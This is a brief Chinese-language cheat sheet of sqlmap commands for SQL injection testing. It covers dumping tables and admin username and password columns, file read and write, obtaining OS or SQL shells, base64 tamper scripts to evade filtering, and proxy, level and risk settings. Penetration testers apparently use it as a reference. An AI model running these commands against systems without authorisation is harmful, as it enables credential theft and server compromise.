参考:https://www.cnblogs.com/bmjoker/p/9326258.html
常规用法:
python sqlmap.py -u "xxx" 直接可以看get请求的url
python sqlmap.py -u "xxx" --tables 猜表
python sqlmap.py -u "xxx" --columns -T "admin" 猜表下面的列
python sqlmap.py -u "xxx" --dump -T "admin" -C "username,password" 直接爆出值
--dump-all 直接猜所有
--sql-shell 直接返回shell
--dbs 返回数据库
高权限:
引出权限:
--is-dba --privileges
引出文件:
--file-read --file-write --file-dest
引出命令:
--os-cmd+ --os-shell --sql-shell
在进行post注入的时候,可以在后面加*(其实可以在数据包每行后面都加上一个*),数据包的完整性
有些网站只能在手机访问,但是sqlmap默认的访问头是电脑头,有些网站就是看文件头的base64编码注入点,需要对参数进行编码,才能进行注入。sqlmap里有自带的过滤规则
python sqlmap -u "xxx" --tamper=base64encode.py
后期代理
--proxy "127.0.0.1:8080"
更多测试
python sqlmap -u "xxx" --level(1-5)#要执行的测试水平等级,默认为1 --risk(0-3) #测试执行的风险等级,默认为1